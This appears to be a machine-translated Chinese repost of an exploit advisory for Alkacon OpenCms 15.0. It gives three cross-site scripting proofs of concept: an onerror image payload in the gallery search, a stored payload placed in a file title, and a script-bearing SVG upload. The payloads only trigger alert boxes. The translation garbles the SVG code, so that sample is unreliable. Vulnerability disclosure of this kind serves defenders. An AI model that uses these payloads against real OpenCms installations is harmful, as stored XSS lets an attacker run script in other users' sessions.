Alkacon Opencms 15.0-多个跨站点脚本（XSS）

HackApt-37 Team · 04 9, 2025

＃利用标题: Alkacon Opencms 15.0-多个跨站点脚本（XSS）
＃日期: 1/07/2023
＃利用作者: TMRSWRR
＃供应商HomePage: http://www.opencms.org
＃软件link: https://github.com/alkacon/opencms-core
＃版本: V15.0
POC:
1）在演示页面中登录，转到此URL
https://demo.opencms.org/workplace# ! explorer/8b72b2fe-180f-11ee-b326-0242ac11002b !/sites/sites/livedemo !
2）单击/.galleries/，右键单击任何png文件后，打开画廊，在搜索按钮中写下此有效载荷
IMG SRC=。 OnError=alert（document.domain）
3）您会看到警报框
POC:
1）转到此URL，右键单击任何PNG文件，重命名标题部分，然后编写有效载荷: IMG SRC=。 OnError=alert（document.domain）
https://demo.opencms.org/workplace# ! explorer/8b72b2fe-180f-11ee-b326-0242ac11002b !/sites/sites/sites/livedemo !/230701/ld_go877op3bfy/.galleries/.galleries/images/！
2）您将看到警报框，存储的XSS
POC:
1）转到此URL，右键单击任何PNG文件并选择替换，单击更改文件并选择您的SVG文件
保存后
SVG文件:
？xml版本='1.0'startalone='no'？
！
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='＃009900'stroke='＃004400'/
脚本类型='text/javascript'
警报（'XSS'）;
/脚本
/svg
2）单击此SVG文件时，您将看到警报按钮